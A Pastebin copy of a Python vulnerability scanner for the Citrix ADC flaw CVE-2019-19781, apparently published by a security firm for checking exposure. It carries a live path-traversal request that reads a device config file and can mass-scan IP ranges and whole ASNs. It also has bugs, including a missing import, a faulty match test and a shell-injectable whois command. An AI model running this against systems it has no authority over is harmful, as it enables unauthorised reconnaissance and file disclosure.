API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jan 20th, 2020
369
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.58 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/env python3
  2. #
  3. # Single check to see if the server is still vulnerable to CVE-2019-19781
  4. # Written by: Dave Kennedy
  5. # Company: TrustedSec
  6. #
  7. import requests
  8. import urllib3
  9. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # disable warnings
  10. import argparse
  11. from netaddr import IPNetwork
  12. import threading
  13. import time
  14. import subprocess
  15.  
  16. def asn_to_ip(asn):
  17. # use ASN listings to enumerate whois information for scanning.
  18. cidr_list = []
  19. command = 'whois -h whois.radb.net -- \'-i origin %s\' | grep -Eo "([0-9.]+){4}/[0-9]+" | head' % (asn)
  20. asn_convert = subprocess.Popen([command], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
  21. stderr_read = asn_convert.stderr.read().decode('utf-8')
  22. asn_convert = asn_convert.stdout.read().decode('utf-8').splitlines()
  23.  
  24. # if we don't have whois installed
  25. if "whois: not found" in stderr_read:
  26. print("[-] In order for ASN looks to work you must have whois installed. Type apt-get install whois as an example on Debian/Ubuntu.")
  27. sys.exit()
  28. # iterate through cidr ranges and append them to list to be scanned
  29. for cidr in asn_convert:
  30. cidr_list.append(cidr)
  31. return cidr_list
  32.  
  33.  
  34. # we need to do this hack job due to sanitization of urls in the latest version of urllib3
  35. # special thanks to rxwx for the fix
  36. def submit_url(url):
  37. with requests.Session() as s:
  38. r = requests.Request(method='GET', url=url)
  39. prep = r.prepare()
  40. prep.url = url
  41. return s.send(prep, verify=False, timeout=2)
  42.  
  43. # our main function for testing the vulnerability
  44. def check_server(target, targetport, verbose):
  45. try:
  46. print("Scanning for CVE-2019-19781 on: %s " % target) # Cleaning up output a little
  47. # if for some ungodly reason they are using HTTP
  48. if targetport == "80":
  49. url = ("http://%s:%s/vpn/js/%%2e./.%%2e/%%76pns/cfg/smb.conf" % (target,targetport))
  50. req = submit_url(url)
  51.  
  52. # for all other requests use HTTPS
  53. else:
  54. url = ("https://%s:%s/vpn/js/%%2e./.%%2e/%%76pns/cfg/smb.conf" % (target,targetport))
  55. req = submit_url(url)
  56.  
  57. # if the system is still vulnerable
  58. if ("[global]") and ("encrypt passwords") and("name resolve order") in str(req.content): # each smb.conf will contain a [global] variable
  59. print("[\033[91m!\033[0m] This Citrix ADC Server: %s is still vulnerable to CVE-2019-19781." % (target))
  60. vulnServers.append(target)
  61. return 1
  62.  
  63. # if the system responds with a Citrix message (fixed) or a 403 (fixed)
  64. elif ("Citrix") in str(req.content) or "403" in str(req.status_code): # only seen if system is not vulnerable
  65. print("[\033[92m*\033[0m] CITRIX Server found, However the server %s is not vulnerable. Awesome!" % (target))
  66.  
  67. # if we run into something other than Citrix
  68. else:
  69. if verbose == True: print("[-] Server %s does not appear to be a Citrix server." % (target))
  70. pass
  71.  
  72. # handle exception errors due to timeouts
  73. except requests.ReadTimeout:
  74. if verbose == True: print("[-] ReadTimeout: Server %s timed out and didn't respond on port: %s." % (target, targetport))
  75. pass
  76.  
  77. except requests.ConnectTimeout:
  78. if verbose == True: print("[-] ConnectTimeout: Server %s did not respond to a web request or the port (%s) is not open." % (target, targetport))
  79. pass
  80.  
  81. except requests.ConnectionError:
  82. if verbose == True: print("[-] ConnectionError: Server %s did not respond to a web request or the port (%s) is not open." % (target,targetport))
  83. pass
  84.  
  85. print("""
  86. _______ ________ ___ ___ __ ___ __ ___ ______ ___ __
  87. / ____\ \ / / ____| |__ \ / _ \/_ |/ _ \ /_ |/ _ \____ / _ \/_ |
  88. | | \ \ / /| |__ ______ ) | | | || | (_) |______| | (_) | / / (_) || |
  89. | | \ \/ / | __|______/ /| | | || |\__, |______| |\__, | / / > _ < | |
  90. | |____ \ / | |____ / /_| |_| || | / / | | / / / / | (_) || |
  91. \_____| \/ |______| |____|\___/ |_| /_/ |_| /_/ /_/ \___/ |_|
  92.  
  93. CVE-2019-19781-Scanner
  94. Company: TrustedSec
  95. Written by: Dave Kennedy
  96. This will look to see if the remote system is still vulnerable to CVE-2019-19781. This
  97. will only scan one host at a time.
  98. You can use CIDR notations as well for example: 192.168.1.1/24
  99. You can use hostnames instead of IP addresses also.
  100. Example: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443
  101. Example2: python3 cve-2019-19781_scanner.py 192.168.1.1 443
  102. Example3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443
  103. Example4: python3 cve-2019-19781_scanner.py as15169 443
  104. Example5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose
  105. Usage: python3 cve-2019-19781_scanner.py targetip targetport
  106. """)
  107.  
  108. vulnServers = []
  109. counter = 0
  110.  
  111. # parse our commands
  112. parser = argparse.ArgumentParser()
  113. parser.add_argument("target", help="the vulnerable server with Citrix (defaults https)")
  114. parser.add_argument("targetport", help="the target server web port (normally on 443)")
  115. parser.add_argument("verbose", nargs="?", help="print out verbose information")
  116. args = parser.parse_args()
  117.  
  118. # if we specify a verbose flag
  119. if args.verbose:
  120. verbose = True
  121. else: verbose = False
  122.  
  123. try:
  124. if "as" in (args.target).lower():
  125. CIDR_Blocks = asn_to_ip(args.target)
  126. for ip_block in CIDR_Blocks:
  127. for ip in IPNetwork(ip_block):
  128. thread = threading.Thread(target=check_server, args=(ip,args.targetport,verbose))
  129. thread.start()
  130. time.sleep(0.05)
  131. # wait for the threads to complete
  132. thread.join()
  133.  
  134. # if we are iterating through IP addresses to scan CIDR notations
  135. elif "/" in args.target:
  136. for ip in IPNetwork(args.target):
  137. counter = counter + 1
  138. thread = threading.Thread(target=check_server, args=(ip,args.targetport,verbose))
  139. thread.start()
  140. time.sleep(0.05)
  141.  
  142. # wait for the threads to complete
  143. thread.join()
  144.  
  145. # if we are just using 1 IP address
  146. else:
  147. counter = counter + 1
  148. check_server(args.target, args.targetport,verbose)
  149.  
  150. # do a report on vuln servers
  151. print("Finished testing %s servers: Found %s to be vulnerable. Below is a list system(s) identified:" % (counter, len(vulnServers)))
  152. print("-" * 45)
  153. for server in vulnServers:
  154. print(server)
  155.  
  156. except KeyboardInterrupt:
  157. print("[!] interrupt received, stopping..")
  158. time.sleep(0.1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!